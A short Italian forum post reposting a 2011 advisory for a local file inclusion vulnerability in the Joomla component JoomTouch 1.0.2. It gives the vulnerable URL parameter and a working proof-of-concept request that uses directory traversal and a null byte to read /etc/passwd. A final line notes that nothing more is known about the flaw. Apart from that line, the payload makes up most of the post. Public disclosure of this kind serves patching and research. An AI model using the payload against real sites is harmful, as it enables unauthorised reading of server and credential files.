Autore Topic: Joomla JoomTouch 1.0.2 LFI Vulnerability (Letto 1935 volte)

jeckodevelopment · « **il:** 18 Ago 2011, 09:54:13 »

Joomla Component JoomTouch 1.0.2 Local File Inclusion Vulnerability

[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability
 
 Software : com_joomtouch ver 1.0.2
 Vendor   : http://www.joomtouch.com/
 
 ===========================================================================
 =====
 
 [o] Exploit
 
 
 http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]
 
 
 
 [o] PoC
 
 
 http://localhost/[path]/index.php?option=com_joomtouch&controller=../..
 /../../../../../../../../../../../../../../../../../etc/passwd%00

Non si hanno ulteriori informazioni sulla presunta vulnerabilità né sul ciclo di sviluppo dell'estensione

Autore Topic: Joomla JoomTouch 1.0.2 LFI Vulnerability (Letto 1935 volte)

jeckodevelopment

Joomla JoomTouch 1.0.2 LFI Vulnerability